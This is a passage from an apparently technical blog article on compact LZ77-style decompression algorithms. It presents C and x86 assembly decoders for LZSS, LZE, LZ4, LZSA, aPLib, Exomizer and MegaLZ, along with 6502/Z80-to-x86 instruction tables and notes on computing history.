        lodsw                     ; ofs = *(uint16_t*)in;
        movzx  ecx, al            ; len = ofs & 15;
        shr    eax, 4             ; ofs >>= 4;
        jz     lz77_copybyte
        
        and    ecx, 15
        inc    ecx                ; len++;
        push   esi
        mov    esi, edi           ; ptr = out - ofs;
        sub    esi, eax           
        rep    movsb              ; while(len--) *out++ = *ptr++;
        pop    esi
    lz77_copybyte:
        movsb                     ; *out++ = *src++;
        jmp    lz77_main
    lz77_exit:
        ; return (out - (uint8_t*)outbuf);
        sub    edi, [esp+32+4]
        mov    [esp+28], edi
        popad
        ret
        
    

    6. Lempel-Ziv-Storer-Szymanski (LZSS)

    Designed by James Storer, Thomas Szymanski, and described in Data Compression via Textual Substitution published in 1982. The match reference in the LZ77 decoder occupies 16-bits or two bytes even when no match exists. That means for every literal are two additional redundant bytes, which isn’t very efficient. LZSS improves the LZ77 format by using one bit to distinguish between a match reference and a literal, and this improves the overall compression ratio. Introspec informed me via email the importance of this paper in describing the many variations of the original LZ77 scheme. Many of which remain unexplored. It also has an overview of the early literature, which is worth examining in more detail. Haruhiko Okumura shared his implementations of LZSS via a BBS in 1988, and this inspired the development of various executable compressors released in the late 1980s and 1990s. The following decoder works with a compressor by Sebastian Steinhauer.

    // to keep track of flags
    typedef struct _lzss_ctx_t {
        uint8_t w;
        uint8_t *in;
    } lzss_ctx;
    
    // read a bit
    uint8_t get_bit(lzss_ctx *c) {
        uint8_t x;
        
        x = c->w;
        c->w <<= 1;
        
        if(c->w == 0) {
          x = *c->in++;
          c->w = (x << 1) | 1;
        }
        return x >> 7;
    }
    
    uint32_t lzss_depack(
      void *outbuf, 
      uint32_t outlen, 
      const void *inbuf) 
    {
        uint8_t  *out, *end, *ptr;
        uint32_t i, ofs, len;
        lzss_ctx c;
        
        // initialize pointers
        out = (uint8_t*)outbuf;
        end = out + outlen;
        
        // initialize context
        c.in = (uint8_t*)inbuf;
        c.w  = 128;
        
        while(out < end) {
          // if bit is not set
          if(!get_bit(&c)) {
            // store literal
            *out++ = *c.in++;
          } else {
            // decode offset and length
            ofs = *(uint16_t*)c.in;
            c.in += 2;
            len = (ofs & 15) + 3;
            ofs >>= 4;
            ptr = out - ofs - 1;
            // copy bytes
            while(len--) *out++ = *ptr++;
          }
        }
        // return length
        return (out - (uint8_t*)outbuf);
    }
    

    The assembly is a straight forward translation of the C code, currently at 69 bytes.

    lzss_depackx:
    _lzss_depackx:
        pushad
        
        lea    esi, [esp+32+4]
        lodsd
        xchg   edi, eax          ; edi = outbuf
        lodsd
        lea    ebx, [edi+eax]    ; ebx = edi + outlen
        lodsd
        xchg   esi, eax          ; esi = inbuf
        mov    al, 128           ; set flags
    lzss_main:
        cmp    edi, ebx          ; while(out < end)
        jnb    lzss_exit
        
        add    al, al            ; c->w <<= 1
        jnz    lzss_check_bit
        
        lodsb                    ; c->w = *c->in++;
        adc    al, al
    lzss_check_bit:
        jc     read_pair         ; if bit set, read len,offset
        
        movsb                    ; *out++ = *c.in++;
        jmp    lzss_main
    read_pair:
        movzx  edx, word[esi]    ; ofs = *(uint16_t*)c.in;
        add    esi, 2            ; c.in += 2;
        mov    ecx, edx          ; len = (ofs % LEN_SIZE) + LEN_MIN;
        and    ecx, 15           ;
        add    ecx, 3            ;
        shr    edx, 4            ; ofs >>= 4
        push   esi
        lea    esi, [edi-1]      ; ptr = out - ofs - 1;
        sub    esi, edx          ;
        rep    movsb             ; while(len--) *out++ = *ptr++;
        pop    esi
        jmp    lzss_main
    lzss_exit:
        ; return (out - (uint8_t*)outbuf);
        sub    edi, [esp+32+4]
        mov    [esp+28], edi
        popad
        ret
    

    7. Lempel-Ziv-Bell (LZB)

    Designed by Tim Bell and described in his 1986 Ph.D. dissertation A Unifying Theory and Improvements for Existing Approaches to Text Compression. It uses a pre-processor based on LZSS and Elias gamma coding of the match length, which results in a compression ratio similar to LZH and LZARI by Okumura. However, it does not suffer the performance penalty of using Huffman or arithmetic coding. Introspec considers it to be the first implementation that uses variable-length coding for reference matches, which is the basis for most modern LZ77-style compressors.

    A key exhibit in a $300 million lawsuit brought by Stac Electronics (SE) against Microsoft was Bell’s thesis. The 1993 case centered around a disk compression utility included with MS-DOS 6.0 called DoubleSpace. SE accused Microsoft of patent violations by using the same compression technologies used in its Stacker product. The courts agreed, and SE were awarded $120 million in compensatory damages.

    8. Intel 8088 / 8086

    For many years, bigger nerds than myself would remind me of what a mediocre architecture the x86 is and that it didn’t deserve to be the most popular CPU for personal computers. But if it’s so bad, how did it become the predominant architecture? It probably commenced in the 1970s with the release of the 8080, and an operating system designed for it by Gary Kildall called Control Program Monitor or Control Program for Microcomputers (CP/M).

    Year Model Data Width (bits) Address Width (bits)
    1971 4004 4 12
    1972 8008 8 14
    1974 4040 4 12
    1974 8080 8 16
    1976 8085 8 16
    1978 8086 16 20
    1979 8088 8 20

    Kildall initially designed and developed CP/M for the 8-Bit 8080 and licensed it to run devices such as the IMSAI 8080 (seen in the movie Wargames). Kildall was motivated by the enormous potential for microcomputers to become regular home appliances. And when IBM wanted to build a microcomputer of its own in 1980, CP/M was the most successful operating system on the market.

    IBM made two decisions: use the existing software and hardware for the 8085-based IBM System/23 by using the 8088 instead of the 8086. (the cost per CPU unit was also a factor); and use its product to run CP/M to remain competitive with other microcomputers on the market.

    Regrettably, Kildall missed a unique opportunity to supply CP/M for the IBM Personal Computer. Instead, Bill Gates / Microsoft obtained licensing to use a cloned version of CP/M called the Quick and Dirty Operating System (QDOS). QDOS was later rebranded to 86-DOS, before being shipped with the first IBM PC as “IBM PC DOS”. Microsoft later purchased 86-DOS, rebranded it Microsoft Disk Operating System (MS-DOS), and forced IBM into a licensing agreement so Microsoft were free to sell MS-DOS to other companies. Kildall would later remark in his unpublished memoir Computer Connections, People, Places, and Events in the Evolution of the Personal Computer Industry. that “Gates is more an opportunist than a technical type and severely opinionated even when the opinion he holds is absurd.”

    8.1 LZE

    Designed by Fabrice Bellard in 1989 and included in the closed-source MS-DOS packer LZEXE by the same. Inspired by LZSS but provides a higher compression ratio. Hiroaki Goto reverse engineered this in 1995 and published an open-source implementation in 2008. The following is a 32-Bit translation of the 16-Bit decoder with some additional optimizations. There’s also a 68K version for anyone interested and a Z80 version by Kei Moroboshi published in 2017.

    lze_depack:
    _lze_depack:
        pushad
        mov    edi, [esp+32+4] ; edi = out
        mov    esi, [esp+32+8] ; esi = in
        
        call   init_get_bit
    lze_get_bit:  
        add    dl, dl            ; 
        jnz    exit_get_bit
        
        mov    dl, [esi]         ; dl = *src++;
        inc    esi
        rcl    dl, 1
    exit_get_bit:
        ret
    init_get_bit:
        pop    ebp
        mov    dl, 128
    lze_cl:
        movsb
    lze_main:
        call   ebp               ; if(get_bit()) continue;
        jc     lze_cl
        
        call   ebp               ; if(get_bit()) {
        jc     lze_copy3
        
        xor    ecx, ecx          ; len = 0
        
        call   ebp               ; get_bit()
        adc    ecx, ecx
        
        call   ebp               ; get_bit()
        adc    ecx, ecx
        
        lodsb                    ; a.b[0] = *in++;
        mov    ah, -1            ; a.b[1] = 0xFF;
    lze_copy1:
        inc    ecx               ; len++;
        jmp    lze_copy2
    lze_copy3:                   ; else
        lodsw
        xchg   al, ah
        mov    ecx, eax
        shr    eax, 3            ; ofs /= 8
        or     ah, 0e0h
        and    ecx, 7            ; len %= 8
        jnz    lze_copy1
        mov    cl, [esi]         ; len = *src++;
        inc    esi
        ; EOF?
        jecxz  lze_exit          ; if(len == 0) break;
    lze_copy2:
        movsx  eax, ax
        push   esi
        lea    esi, [edi+eax]
        inc    ecx
        rep    movsb
        pop    esi
        jmp    lze_main
        ; return (out - (uint8_t*)outbuf);
    lze_exit:
        sub    edi, [esp+32+4]
        mov    [esp+28], edi
        popad
        ret
    

    8.2 LZ4

    Designed by Yann Collet and published in 2011. LZ4 is fast for both compression and decompression with a small decoder. Speed is somewhere between DEFLATE and LZO, while the compression ratio is similar to LZO but worse than DEFLATE. Despite the compression ratio being worse than DEFLATE, LZ4 doesn’t require a Huffman or arithmetic/range decoder. The following 32-Bit code is a conversion of the 8088/8086 implementation by Trixter. Jørgen Ibsen has implemented LZ4 with optimal parsing using BriefLZ algorithms.

    lz4_depack:
    _lz4_depack:
        pushad
        lea     esi,[esp+32+4]
        lodsd                   ;load target buffer
        xchg    eax,edi
        lodsd
        xchg    eax,ebx         ;BX = chunk length minus header
        lodsd                   ;load source buffer
        xchg    eax,esi
        add     ebx,esi         ;BX = threshold to stop decompression
        xor     ecx,ecx
    @@parsetoken:               ;CX=0 here because of REP at end of loop
        mul     ecx
        lodsb                   ;grab token to AL
        mov     dl,al           ;preserve packed token in DX
    @@copyliterals:
        shr     al,4            ;unpack upper 4 bits
        call    buildfullcount  ;build full literal count if necessary
    @@doliteralcopy:            ;src and dst might overlap so do this by bytes
        rep     movsb           ;if cx=0 nothing happens
    ;At this point, we might be done; all LZ4 data ends with five literals and the
    ;offset token is ignored.  If we're at the end of our compressed chunk, stop.
        cmp     esi,ebx         ;are we at the end of our compressed chunk?
        jae     done            ;if so, jump to exit; otherwise, process match
    @@copymatches:
        lodsw                   ;AX = match offset
        xchg    edx,eax         ;AX = packed token, DX = match offset
        and     al,0Fh          ;unpack match length token
        call    buildfullcount  ;build full match count if necessary
    @@domatchcopy:
        push    esi             ;ds:si saved, xchg with ax would destroy ah
        mov     esi,edi
        sub     esi,edx
        add     ecx,4           ;minmatch = 4
                                ;Can't use MOVSWx2 because [es:di+1] is unknown
        rep     movsb           ;copy match run if any left
        pop     esi
        jmp     @@parsetoken
    buildfullcount:
                                ;CH has to be 0 here to ensure AH remains 0
        cmp     al,0Fh          ;test if unpacked literal length token is 15?
        xchg    ecx,eax         ;CX = unpacked literal length token; flags unchanged
        jne     builddone       ;if AL was not 15, we have nothing to build
    buildloop:
        lodsb                   ;load a byte
        add     ecx,eax         ;add it to the full count
        cmp     al,0FFh         ;was it FF?
        je      buildloop       ;if so, keep going
    builddone:
        ret
    done:
        sub     edi,[esp+32+4];subtract original offset from where we are now
        mov     [esp+28], edi
        popad
        ret
    

    8.3 LZSA

    Designed by Emmanuel Marty with participation from Introspec and published in 2018. Introspec explains the difference between the two formats, LZSA1 and LZSA2.

    LZSA1 is designed to directly compete with LZ4. If you compress using “lzsa -f1 -r INPUT OUTPUT”, you are very likely to get higher compression ratio than LZ4 and probably slightly lower decompression speed compared to LZ4 (I am comparing speeds of LZSA1 fast decompressor and LZ4 fast decompressor, both hand-tuned by myself). If you really want to compete with LZ4 on speed, you need to compress using one of the “boost” options “lzsa -f1 -r -m4 INPUT OUTPUT” (better ratio, similar speed to LZ4) or “lzsa -f1 -r -m5 INPUT OUTPUT” (similar ratio, faster decompression than LZ4).

    LZSA2 is approximately in the same league as BitBuster or ZX7. It’s likely to be worse if you’re compressing pure graphics (at least this is what we are seeing on ZX Spectrum), but it has much larger window and is pretty decent at compressing mixed data (e.g. a complete game binary or something similar). We accepted that the compression ratio is not the best because we wanted to preserve some of its speed. You should expect LZSA2 to decompress data about 50% faster than best I can do for ZX7. I did not do tests on BitBuster, but I just had a look at decompressor for ver.1.2 and there is no way it can compete with LZSA2 on speed.

    lzsa1_decompress:
    _lzsa1_decompress:
        pushad
        
        mov    edi, [esp+32+4]    ; edi = outbuf
        mov    esi, [esp+32+8]    ; esi = inbuf
        
        xor    ecx, ecx
    .decode_token:
        mul    ecx
        lodsb                     ; read token byte: O|LLL|MMMM
        mov    dl, al             ; keep token in dl
       
        and    al, 070H           ; isolate literals length in token (LLL)
        shr    al, 4              ; shift literals length into place
    
        cmp    al, 07H            ; LITERALS_RUN_LEN?
        jne    .got_literals      ; no, we have the full literals count from the token, go copy
    
        lodsb                     ; grab extra length byte
        add    al, 07H            ; add LITERALS_RUN_LEN
        jnc    .got_literals      ; if no overflow, we have the full literals count, go copy
        jne    .mid_literals
    
        lodsw                     ; grab 16-bit extra length
        jmp    .got_literals
    
    .mid_literals:
        lodsb                     ; grab single extra length byte
        inc    ah                 ; add 256
    
    .got_literals:
        xchg   ecx, eax
        rep    movsb              ; copy cx literals from ds:si to es:di
    
        test   dl, dl             ; check match offset size in token (O bit)
        js     .get_long_offset
    
        dec     ecx
        xchg    eax, ecx          ; clear ah - cx is zero from the rep movsb above
        lodsb
        jmp     .get_match_length
    
    .get_long_offset:
        lodsw                     ; Get 2-byte match offset
    
    .get_match_length:
        xchg    eax, edx          ; edx: match offset  eax: original token
        and     al, 0FH           ; isolate match length in token (MMMM)
        add     al, 3             ; add MIN_MATCH_SIZE
    
        cmp     al, 012H          ; MATCH_RUN_LEN?
        jne     .got_matchlen     ; no, we have the full match length from the token, go copy
    
        lodsb                     ; grab extra length byte
        add     al,012H           ; add MIN_MATCH_SIZE + MATCH_RUN_LEN
        jnc     .got_matchlen     ; if no overflow, we have the entire length
        jne     .mid_matchlen       
    
        lodsw                     ; grab 16-bit length
        test    eax, eax          ; bail if we hit EOD
        je      .done_decompressing 
        jmp     .got_matchlen
    
    .mid_matchlen:
        lodsb                     ; grab single extra length byte
        inc     ah                ; add 256
    
    .got_matchlen:
        xchg    ecx, eax          ; copy match length into ecx
        xchg    esi, eax          
        mov     esi, edi          ; esi now points at back reference in output data
        movsx   edx, dx           ; sign-extend dx to 32-bits.
        add     esi, edx
        rep     movsb             ; copy match
        xchg    esi, eax          ; restore esi
        jmp     .decode_token     ; go decode another token
    
    .done_decompressing:
        sub    edi, [esp+32+4]
        mov    [esp+28], edi      ; eax = decompressed size
        popad
        ret                       ; done
    

    8.4 aPLib

    Designed by Jørgen Ibsen and published in 1998, it continues to remain a closed-source compressor. Fortunately, an open-source version of the compressor called aPUltra is available, which was released by Emmanuel Marty in 2019. The small compressor in x86 assembly follows.

    apl_decompress:
    _apl_decompress:
        pushad
    
        %ifdef CDECL
          mov    esi, [esp+32+4]  ; esi = aPLib compressed data
          mov    edi, [esp+32+8]  ; edi = output
        %endif
        
        ; === register map ===
        ;  al: bit queue
        ;  ah: unused, but value is trashed
        ; ebx: follows_literal
        ; ecx: scratch register for reading gamma2 codes and storing copy length
        ; edx: match offset (and rep-offset)
        ; esi: input (compressed data) pointer
        ; edi: output (decompressed data) pointer
        ; ebp: offset of .get_bit 
               
        mov     al,080H         ; clear bit queue(al) and set high bit to move into carry
        xor     edx, edx        ; invalidate rep offset in edx
    
        call    .init_get_bit
    .get_dibits:
        call    ebp             ; read data bit
        adc     ecx,ecx         ; shift into cx
    .get_bit:
        add     al,al           ; shift bit queue, and high bit into carry
        jnz     .got_bit        ; queue not empty, bits remain
        lodsb                   ; read 8 new bits
        adc     al,al           ; shift bit queue, and high bit into carry
    .got_bit:
        ret
    .init_get_bit:
        pop     ebp             ; load offset of .get_bit, to be used with call ebp
        add     ebp, .get_bit - .get_dibits
    .literal:
        movsb                   ; read and write literal byte
    .next_command_after_literal:
        push    03H
        pop     ebx             ; set follows_literal(bx) to 3
        
    .next_command:
        call    ebp             ; read 'literal or match' bit
        jnc     .literal        ; if 0: literal
                                
                                ; 1x: match
        call    ebp             ; read '8+n bits or other type' bit
        jc      .other          ; 11x: other type of match
                                ; 10: 8+n bits match
        call    .get_gamma2     ; read gamma2-coded high offset bits
        sub     ecx,ebx         ; high offset bits == 2 when follows_literal == 3 ?
                                ; (a gamma2 value is always >= 2, so substracting follows_literal when it
                                ; is == 2 will never result in a negative value)
        jae     .not_repmatch   ; if not, not a rep-match
        call    .get_gamma2     ; read match length
        jmp     .got_len        ; go copy
    .not_repmatch:
        mov     edx,ecx         ; transfer high offset bits to dh
        shl     edx,8
        mov     dl,[esi]        ; read low offset byte in dl
        inc     esi
        call    .get_gamma2     ; read match length
        cmp     edx,7D00H       ; offset >= 32000 ?
        jae     .increase_len_by2 ; if so, increase match len by 2
        cmp     edx,0500H       ; offset >= 1280 ?
        jae     .increase_len_by1 ; if so, increase match len by 1
        cmp     edx,0080H       ; offset < 128 ?
        jae     .got_len        ; if so, increase match len by 2, otherwise it would be a 7+1 copy
    .increase_len_by2:
        inc     ecx             ; increase length
    .increase_len_by1:
        inc     ecx             ; increase length
        ; copy ecx bytes from match offset edx
    .got_len:
        push    esi             ; save esi (current pointer to compressed data)
        mov     esi,edi         ; point to destination in edi - offset in edx
        sub     esi,edx
        rep     movsb           ; copy matched bytes
        pop     esi             ; restore esi
        mov     bl,02H          ; set follows_literal to 2 (ebx is unmodified by match commands)
        jmp     .next_command
        ; read gamma2-coded value into ecx
    .get_gamma2:
        xor     ecx,ecx         ; initialize to 1 so that value will start at 2
        inc     ecx             ; when shifted left in the adc below
    .gamma2_loop:
        call    .get_dibits     ; read data bit, shift into cx, read continuation bit
        jc      .gamma2_loop    ; loop until a zero continuation bit is read
        ret
        ; handle 7 bits offset + 1 bit len or 4 bits offset / 1 byte copy
    .other:
        xor     ecx,ecx
        call    ebp             ; read '7+1 match or short literal' bit
        jc      .short_literal  ; 111: 4 bit offset for 1-byte copy
                                ; 110: 7 bits offset + 1 bit length
                                
        movzx   edx,byte[esi]   ; read offset + length in dl
        inc     esi
        inc     ecx             ; prepare cx for length below
        shr     dl,1            ; shift len bit into carry, and offset in place
        je      .done           ; if zero offset: EOD
        adc     ecx,ecx         ; len in cx: 1*2 + carry bit = 2 or 3
        jmp     .got_len
        ; 4 bits offset / 1 byte copy
    .short_literal:
        call    .get_dibits     ; read 2 offset bits
        adc     ecx,ecx
        call    .get_dibits     ; read 2 offset bits
        adc     ecx,ecx
        xchg    eax,ecx         ; preserve bit queue in cx, put offset in ax
        jz      .write_zero     ; if offset is 0, write a zero byte
                                ; short offset 1-15
        mov     ebx,edi         ; point to destination in es:di - offset in ax
        sub     ebx,eax         ; we trash bx, it will be reset to 3 when we loop
        mov     al,[ebx]        ; read byte from short offset
    .write_zero:
        stosb                   ; copy matched byte
        xchg    eax,ecx         ; restore bit queue in al
        jmp     .next_command_after_literal
    .done:
        sub     edi, [esp+32+8] ; compute decompressed size
        mov     [esp+28], edi
        popad
        ret
    

    9. MOS Technology 6502

    This 8-Bit CPU was the product of Motorola management, ignoring customer concerns about the cost of the 6800 CPU launched by the company in 1974. Following consultations with potential customers for the 6800. Chuck Peddle tried to convince Motorola to develop a low-cost alternative for consumers on a limited budget.

    Motorola ordered Peddle to cease working on this idea, which resulted in his departure from the company with several other employees that began working on the 6502 at MOS Technology. Used in the Commodore 64, the Apple II, and the BBC Micro home computers, including various gaming consoles, Motorola acknowledged missing a golden opportunity. The company would later express regret for dismissing Peddle’s idea since the 6502 was far more successful than the 6800.

    Trivia: The Terminator movie from 1984 uses CPU instructions from the 6502. 🙂

    Those of you that want to program a Commodore 64 without purchasing one can always use an emulator like VICE. For the Apple II, there’s AppleWin. (Yes, Windows only). Since Qkumba already implemented several popular depackers for 6502, I requested a translation of the Exomizer compression algorithm. Using this translation, I created the following table, which lists 6502 instructions and their equivalent for x86. The EBX and ECX registers replace the X and Y registers, respectively. Using #$80 as an immediate value is simply for demonstration, and you’ll find a full list of instructions here.

    6502 x86 Description
    lda #$80 mov al, 0x80 Load byte into accumulator.
    sta [address] mov [address], al Store accumulator in memory.
    cmp #$80 cmp al, 0x80 Compare byte with accumulator.
    cpx #$80 cmp bl, 0x80 Compare byte with X.
    cpy #$80 cmp cl, 0x80 Compare byte with Y.
    asl shl al, 1 ASL shifts all bits left one position. 0 is shifted into bit 0 and the original bit 7 is shifted into the Carry.
    lsr shr al, 1 Logical shift right.
    bit #$7 test al, 7 Perform a bitwise AND, set the flags and discard the result.
    sec stc SEt the Carry flag.
    adc #$80 adc al, 0x80 Add byte with Carry.
    sbc #$1 sbb al, 1 Subtract byte with Carry.
    rts ret Return from subroutine.
    jsr call Save next address and jump to subroutine.
    eor #$80 xor al, 0x80 Perform an exclusive OR.
    ora #$80 or al, 0x80 Perform a bitwise OR.
    and #$80 and al, 0x80 Bitwise AND with accumulator
    rol rcl al, 1 Shifts all bits left one position. The Carry is shifted into bit 0 and the original bit 7 is shifted into the Carry.
    ror rcr al, 1 Shifts all bits right one position. The Carry is shifted into bit 7 and the original bit 0 is shifted into the Carry.
    bpl jns Branch on PLus. Jump if Not Signed.
    bmi js Branch on MInus. Jump if Signed.
    bcc:bcs jnc:jc Branch on Carry Clear. Branch on Carry Set.
    bne:beq jne:je Branch on Not Equal. Branch on EQual.
    bvc:bvs jno:jo Branch on oVerflow Clear. Branch on oVerflow Set.
    php pushf PusH Processor status.
    plp popf PuLl Processor status.
    pha push eax PusH Accumulator.
    pla pop eax PuLl Accumulator.
    tax movzx ebx, al / mov bl, al Transfer A to X.
    tay movzx ecx, al / mov cl, al Transfer A to Y.
    txa mov al, bl Transfer X to A.
    tya mov al, cl Transfer Y to A.
    inx inc ebx / inc bl INcrement X.
    iny inc ecx / inc cl INcrement Y.
    dex dec ebx / dec bl DEcrement X.
    dey dec ecx / dec cl DEcrement Y.

    9.1 Exomizer

    Designed by Magnus Lind and published in 2002. Exomizer is popular for devices such as the Commodore VIC20, the C64, the C16/plus4, the C128, the PET 4032, the Atari 400/800 XL/XE, the Apple II+e, the Oric-1, the Oric Atmos, and the BBC Micro B. It inspired the development of other executable compressors, most notably PackFire. Qkumba was kind enough to provide a translation of the Exomizer 3 decoder translated from 6502 to x86. However, due to the complexity of the source code, only a snippet of code is shown here. The Y register maps to the EDI register while the X register maps to the ESI register.

    %MACRO mac_get_bits 0
            call get_bits                   ;jsr get_bits
    %ENDM
    get_bits:
            adc  al, 0x80                   ;adc #$80                ; needs c=0, affects v
            pushfd
            shl  al, 1                      ;asl
            lahf
            jns  gb_skip                    ;bpl gb_skip
    gb_next:
            shl  byte [zp_bitbuf], 1        ;asl zp_bitbuf
            jne  gb_ok                      ;bne gb_ok
            mac_refill_bits                 ;+mac_refill_bits
    gb_ok:
            rcl  al, 1                      ;rol
            lahf
            test al, al
            js   gb_next                    ;bmi gb_next
    gb_skip:
            popfd
            sahf
            jo   gb_get_hi                  ;bvs gb_get_hi
            ret                             ;rts
    gb_get_hi:
            stc                             ;sec
            mov  [zp_bits_hi], al           ;sta zp_bits_hi
            jmp  get_crunched_byte          ;jmp get_crunched_byte
    %ENDIF
    ; -------------------------------------------------------------------
    ; calculate tables (62 bytes) + get_bits macro
    ; x and y must be #0 when entering
    ;
            clc                             ;clc
    table_gen:
            movzx esi, al                   ;tax
            mov   eax, edi                  ;tya
            and   al, 0x0f                  ;and #$0f
            mov   [edi + tabl_lo], al       ;sta tabl_lo,y
            je    shortcut                  ;beq shortcut            ; start a new sequence
    ; -------------------------------------------------------------------
            mov   eax, esi                  ;txa
            adc   al, [edi + tabl_lo - 1]   ;adc tabl_lo - 1,y
            mov   [edi + tabl_lo], al       ;sta tabl_lo,y
            mov   al, [zp_len_hi]           ;lda zp_len_hi
            adc   al, [edi + tabl_hi - 1]   ;adc tabl_hi - 1,y
    shortcut:
            mov   [edi + tabl_hi], al       ;sta tabl_hi,y
    ; -------------------------------------------------------------------
            mov   al, 0x01                  ;lda #$01
            mov   [zp_len_hi], al           ;sta <zp_len_hi
            mov   al, 0x78                  ;lda #$78                ; %01111000
            mac_get_bits                    ;+mac_get_bits
    ; -------------------------------------------------------------------
            shr   al, 1                     ;lsr
            movzx esi, al                   ;tax
            je    rolled                    ;beq rolled
            pushfd                          ;php
    rolle:
            shl  byte [zp_len_hi],1         ;asl zp_len_hi
            stc                             ;sec
            rcr  al, 1                      ;ror
            dec  esi                        ;dex
            jne  rolle                      ;bne rolle
            popfd                           ;plp
    rolled:
            rcr  al, 1                      ;ror
            mov  [edi + tabl_bi], al        ;sta tabl_bi,y
            test al, al
            js   no_fixup_lohi              ;bmi no_fixup_lohi
            mov  al, [zp_len_hi]            ;lda zp_len_hi
            mov  ebx, esi
            mov  [zp_len_hi], bl            ;stx zp_len_hi
            jmp  skip_fix                   ;!BYTE $24
    no_fixup_lohi:
            mov  eax, esi                   ;txa
    ; -------------------------------------------------------------------
    skip_fix:
            inc  edi                        ;iny
            cmp  edi, encoded_entries       ;cpy #encoded_entries
            jne  table_gen                  ;bne table_gen
    

    9.2 Pucrunch

    Designed by Pasi Ojala and published in 1997. It’s described by the author as a Hybrid LZ77 and RLE compressor, using Elias gamma coding for reference length, and a mixture of gamma and linear code for the offset. It requires no additional memory for decompression. The description and source code are well worth a read for those of you that want to understand the characteristics of other LZ77-style compressors.

    10. Zilog 80

    I was able to design whatever I wanted. And personally I wanted to develop the best and the most wonderful 8-Bit microprocessor in the world.Masatoshi Shima

    After helping to design microprocessors at Intel (4-Bit 4004, the 8-Bit 8008 and 8080), Ralph Ungermann and Federico Faggin left Intel in 1974 to form Zilog. Masatoshi Shima, who also worked at Intel, would later join the company in 1975 to work on an 8-Bit CPU released in 1976 they called the Z80. The Z80 is essentially a clone of the Intel 8080 with support for more instructions, more registers, and 16-Bit capabilities. Many of the Z80 instructions, to the best of my knowledge, do not have an equivalent on the x86. Proceed with caution, as with no prior experience writing for the Z80, some of the mappings presented here may be incorrect.

    Z80 x86 Z80 Description
    bit test Perform a bitwise AND, set state flags and discard result.
    ccf cmc Inverts/Complements the carry flag.
    cp cmp Performs subtraction from A. Sets flags and discards result.
    djnz loop Decreases B and jumps to a label if Not Zero. If mapping BC to CX, LOOP works or REP depending on operation.
    ex xchg Exchanges two 16-bit values.
    exx EXX exchanges BC, DE, and HL with shadow registers with BC’, DE’, and HL’. Unfortunately, nothing like this available for x86. Try to use spare registers or rewrite algorithm to avoid using EXX.
    jp jcc Conditional or unconditional jump to absolute address.
    jr jcc Conditional or unconditional jump to relative address not exceeding 128-bytes ahead or behind.
    ld mov Load/Copy immediate value or register to another register.
    ldi movsb Performs a “LD (DE),(HL)”, then increments DE and HL. Map SI to HL, DI to DE and you can perform the same operation quite easily on x86.
    ldir rep movsb Repeats LDI (LD (DE),(HL), then increments DE, HL, and decrements BC) until BC=0. Note that if BC=0 before this instruction is called, it will loop around until BC=0 again.
    res btr Reset bit. BTR doesn’t behave exactly the same, but it’s close enough. An alternative might be masking with AND.
    rl / rla / rlc / rlca rcl or adc The register is shifted left and the carry flag is put into bit zero of the register. The 7th bit is put into the carry flag. You can perform the same operation using ADC (Add with Carry).
    rld Performs a 4-bit leftward rotation of the 12-bit number whose 4 most signigifcant bits are the 4 least significant bits of A, and its 8 least significant bits are in (HL).
    rr / rra / r rcr 9-bit rotation to the right. The carry is copied into bit 7, and the bit leaving on the right is copied into the carry.
    rra Performs a RR A faster, and modifies the flags differently.
    sbc sbb Sum of second operand and carry flag is subtracted from the first operand. Results are written into the first operand.
    sla sal
    sll/sl1 shl An “undocumented” instruction. Functions like sla, except a 1 is inserted into the low bit.
    sra sar Arithmetic shift right 1 bit, bit 0 goes to carry flag, bit 7 remains unchanged.
    srl shr Like SRA, except a 0 is put into bit 7. The bits are all shifted right, with bit 0 put into the carry flag.

    10.1 Mega LZ

    Designed by the demo group MAYhEM and published in 2005. The original Z80 decoder by fyrex was optimized by Introspec in 2017 while researching 8-Bit compression algorithms. The x86 assembly based on that uses the following register mapping.

    Register Mapping
    Z80 x86
    A AL
    B EBX
    C ECX
    D DH
    E DL
    HL ESI
    DE EDI

    The EBX and ECX registers are to replace the B and C registers, respectively, to save a few bytes required for incrementing and decrementing 8-bit registers on x86.

    megalz_depack:
    _megalz_depack:
        pushad
        
        mov    esi, [esp+32+12]  ; esi = inbuf
        mov    edi, [esp+32+ 4]  ; edi = outbuf
        
        call   init_get_bit
        
        add    al, al            ; add a, a
        jnz    exit_get_bit      ; ret nz
        lodsb                    ; ld a, (hl)
                                 ; inc hl
        adc    al, al            ; rla
    exit_get_bit:
        ret                      ; ret
    init_get_bit:
        pop    ebp               ;
        mov    al, 128           ; ld a, 128
    mlz_literal:
        movsb                    ; ldi
    mlz_main:
        call   ebp               ; GET_BIT
        jc     mlz_literal       ; jr c, mlz_literal
        xor    edx, edx
        mov    dh, -1            ; ld d, #FF
        xor    ebx, ebx          ; ld bc, 2
        push   2
        pop    ecx
        call   ebp               ; GET_BIT
        jc     CASE01x           ; jr c, CASE01x
        call   ebp               ; GET_BIT
        jc     mlz_short_ofs     ; jr c, mlz_short_ofs
    CASE000:
        dec    ecx               ; dec c
        mov    dl, 63            ; ld e, %00111111
    ReadThreeBits:
        call   ebp               ; GET_BIT
        adc    dl, dl            ; rl e
        jnc    ReadThreeBits     ; jr nc, ReadThreeBits
    mlz_copy_bytes:
        push   esi               ; push hl
        movsx  edx, dx           ; sign-extend dx to 32-bits
        lea    esi, [edi+edx]    ; 
        rep    movsb             ; ldir
        pop    esi               ; pop hl
        jmp    mlz_main          ; jr mlz_main
    CASE01x:
        call   ebp               ; GET_BIT
        jnc    CASE010           ; jr nc, CASE010
        dec    ecx               ; dec c
    ReadLogLength:
        call   ebp               ; GET_BIT
        inc    ebx               ; inc b
        jnc    ReadLogLength     ; jr nc, ReadLogLength
    mlz_read_len:
        call   ebp               ; GET_BIT
        adc    cl, cl            ; rl c
        jc     mlz_exit          ; jr c, mlz_exit
        dec    ebx               ; djnz mlz_read_len
        jnz    mlz_read_len
        inc    ecx               ; inc c
    CASE010:
        inc    ecx               ; inc c
        call   ebp               ; GET_BIT
        jnc    mlz_short_ofs     ; jr nc, mlz_short_ofs
        mov    dh, 31            ; ld d, %00011111
    mlz_long_ofs:
        call   ebp               ; GET_BIT
        adc    dh, dh            ; rl d
        jnc    mlz_long_ofs      ; jr nc, mlz_long_ofs
        dec    edx               ; dec d
    mlz_short_ofs:
        mov    dl, [esi]         ; ld e, (hl)
        inc    esi               ; inc hl
        jmp    mlz_copy_bytes    ; jr mlz_copy_bytes
    mlz_exit:
        sub    edi, [esp+32+4]
        mov    [esp+28], edi     ; eax = decompressed length
        popad
        ret
    

    10.2 ZX7

